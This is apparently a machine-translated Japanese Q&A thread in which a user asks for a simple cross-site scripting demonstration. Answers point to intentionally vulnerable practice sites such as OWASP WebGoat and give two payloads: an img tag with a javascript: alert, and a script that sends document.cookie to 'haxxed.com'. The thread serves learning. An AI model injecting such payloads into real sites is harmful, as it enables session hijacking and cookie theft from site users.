クロスサイトスクリプティング攻撃の簡単な例
誰かが クロスサイトスクリプティング 私のブラウザで有効な攻撃を見せてもらえますか?インターネット上でこれを行う例はありますか?私はインターネットでこれを見つけていません。
例が単純であるほど優れています。
http://www.insecurelabs.org および http://www.insecurelabs.org/task/ を参照してください
検索フィールドおよびその他のいくつかの場所で、意図的にXSSに対して脆弱です。
通常、ライブXSSの例では、独自のサーバー側ソフトウェアをインストールする必要があります。 Webサーファーに意図的にXSSの欠陥を公開する正当なサイトは多くありません。
XSS(他の多くのものも含めて)を自分でデモンストレーションできる既製のサーバー側ソフトウェアの1つは、OWASPのWebGoatです。 WebGoatをインストールしてXSSをデモンストレーションするための指示 です。 OWASPの記事「 Cross-site scripting(XSS) 」に、XSSを有効にするプログラムスニペットの追加例があります。
<img src="javascript:alert('hello everybody')"></img>挿入した画像タグはxssの例です。上記のsrcには、警告するJavaスクリプトが含まれています。
単純なフォームも次のようになります。メッセージボックスが表示された場合、ページまたはサーバーが脆弱であることがわかります。
<script>window.location = 'haxxed.com? cookie=' + document.cookie</script>
テクニックの仕組みの優れたサンプルは、ここにあります https://www.hacksplaining.com/exercises/xss-stored